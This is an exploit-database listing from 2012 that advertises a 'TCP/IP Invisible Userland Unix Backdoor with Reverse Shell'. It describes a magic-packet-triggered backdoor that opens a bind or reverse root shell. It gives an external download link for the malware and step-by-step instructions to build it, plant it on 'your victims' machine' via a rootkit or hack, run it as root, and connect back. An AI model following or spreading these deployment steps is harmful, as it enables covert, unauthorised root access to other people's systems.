TCP/IP Invisible Userland Unix Backdoor with Reverse Shell

2012-06-30T00:00:00
ID 1337DAY-ID-18879
Type zdt
Reporter d3v/0
Modified 2012-06-30T00:00:00

Description

Exploit for unix platform in category local exploits

                                        
                                            ============================================
TCP/IP Invisible Userland Unix Backdoor with Reverse Shell
============================================
/*
 *  ______   ______                  _  _______
 * (  __  \ / ___  \ |\     /|      ( )(  __   )
 * | (  \  )\/   \  \| )   ( |     / / | (  )  |
 * | |   ) |   ___) /| |   | |    / /  | | /   |
 * | |   | |  (___ ( ( (   ) )   / /   | (/ /) |
 * | |   ) |      ) \ \ \_/ /   / /    |   / | |
 * | (__/  )/\___/  /  \   /   / /     |  (__) |
 * (______/ \______/    \_/   (_)      (_______)
 */
########################################################################
# Author: D3V/0
# Exploit Title: TCP/IP Invisible Userland Unix Backdoor with Reverse Shell
# Date: 06-30-2012
# Version: 0.0.1
# Category: platform
# Tested on: unix
# Contact: [email protected]
# Website: milw0rm / Inj3ct0r Exploit DataBase 1337day.com
########################################################################
[info]
this is an advanced and invisible unix userland backdoor based on tcp/ip. the server waits for magic packets by sniffing. if a magic packet arrives, it will bind a shell over tcp or udp on the given port. the client can then send further magic packets to get a reverse-shell.

[code]
this backdoor is fully written in c.

[download]
you can download the backdoor here: http://www.multiupload.nl/Q864SZGXL9

[install]
do "make linux", if you want to build the backdoor for linux systems. if you just type "make", you will see a list of all supported and tested unix systems.
once it's compiled, put the "ubdd" executable on your victims' machine and start it with root. (you can infect the machine with the backdoor via a rootkit or a hack)
now start "un1xb4ckd00r" on your machine. use the "-H" argument to find out what to do.
if done right, you will have a reverse shell to your victims' machine with full root access.


[more]
for more information consult the README file.
########################################################################################


# [email protected] [2012-06-30]



#  0day.today [2018-02-18]  #